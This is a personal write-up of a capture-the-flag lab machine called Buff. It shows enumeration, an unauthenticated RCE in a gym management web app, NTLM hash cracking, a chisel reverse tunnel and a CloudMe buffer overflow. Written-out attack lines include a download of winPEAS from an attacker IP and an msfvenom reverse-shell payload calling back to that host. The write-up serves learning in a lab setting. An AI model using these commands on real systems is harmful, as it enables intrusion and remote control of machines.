Buff
Personal Rating: Hard
sudo nmap -sV <IP>
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
Running (JUST GUESSING): Microsoft Windows XP (85%)Port 8080 shows this page:
This can be seen at ‘Contact’:
mrb3n's Bro Hut
Made using Gym Management Software 1.0
There are some obvious webpages and the backend appears to be php based.
The pages are php, so if I don't find anything else, I might scan for php parameters.
For sign in, a POST to /include/process_login.php is made with this data for test@aua.com : test
email=test%40aua.com&password=&p=ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff
The password is sent in encoded format as it seems.
A basic webdir bruteforce revealed even more pages:
feroxbuster -u http://10.10.10.198:8080/ -x php
“Gym Management System 1.0” actually seems to exist and this looks promising:
RCE
There was an unauthenticated RCE that I could find online on ExploitDB and with searchsploit. But these PoCs were Python2 and I found a Python3 version:
Persistence
evil.bat:
./evil.bat
Internal Enumeration
There is an unusual folder “UNP” in Program Files. But it does not seem interesting
There is a file Tasks.bat in C:\Users\shaun\Documents with these contents:
START C:/xampp/xampp_start.exe
The user we got is not in interesting groups:
PS C:\xampp> net user shaun
I got winPEASx64 on the host and ran it.
wget http://10.10.16.6:8000/winPEASx64.exe -OutFile winpeas.exe
.\winpeas.exe
I collected the systeminfo command output to search for vulnerabilities:
winpeas found the NetNTLMv2 Hash of shaun
shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000
cracking it with hashcat, the password is empty.
hashcat -a 0 -m 5600 'shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000' /usr/share/seclists/Passwords/rockyou.txt
It seems like unauthenticated users can create files and write data to C:\windows\tasks and C:\windows\system32\tasks
shaun has full access to C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Also, path injections seem to be possible for many Session Manager DLLs.
There were no interesting existing scheduled tasks:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
I tried to create a scheduled task, but that did not work due to lack of permissions
schtasks /Create /RU "SYSTEM" /SC MINUTE /MO 1 /TN "SchedPE" /TR "cmd /c C:\Users\shaun\Documents\privesc.bat"
xampp 7.4.6 seems to be in use.
The server is listening on several ports, but only 8080 and 7460 are accessible from outside
Port 7460 seems to be unassigned, so I am not sure what runs on it.
I could not place a simple meterpreter shell on the host because it was blocked by defender.
I found the interesting file C:\users\shaun\downloads\CloudMe_1112.exe
CloudME Bof
searchsploit cloudme
Using netstat -ano I could determine that the port 8888 is listening locally, which is the port for the cloudme service. Since it it listening only locally, I esablished a socks reverse proxy:
ATTACKER: ./chisel server -p 9050 --reverse
TARGET: .\chisel.exe client 10.10.16.6:9050 R:socks
I tried to use this exploit PoC using proxychains over the tunnel, but it says that the port could not be connected to.
I might create a reverse shell shellcode with msfvenom, put it in the exploitdb PoC and try that one with Python2 (pyenv).
I finally made it work with this (modified) exploit script: *see appendix
Prerequisites:
msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python
Put that in the python exploit
Exploitation:
Attackhost terminal 0:
./chisel server -p 9050 --reverseTarget terminal 0:
.\chisel.exe client 10.10.16.6:9050 R:socksAttackhost terminal 1:
msf6 exploit(multi/handler) > runAttackhost terminal 2:
proxychains python2.7 PoC_exploit_Win10_x64.py
An interesting takeaway for me was the EXITFUNC=thread feature. The default is ‘process’, but the user has no permissions to deal with processes and I think that was the issue at first. When it worked I also used a reverse shell instead of a bind shell. But I think both could have worked. It was also a good practise to generate a custom shellcode for the existing PoC, for which I additionally had to fix some simple Python code errors.
Appendix: Python bof Exploit
Last updated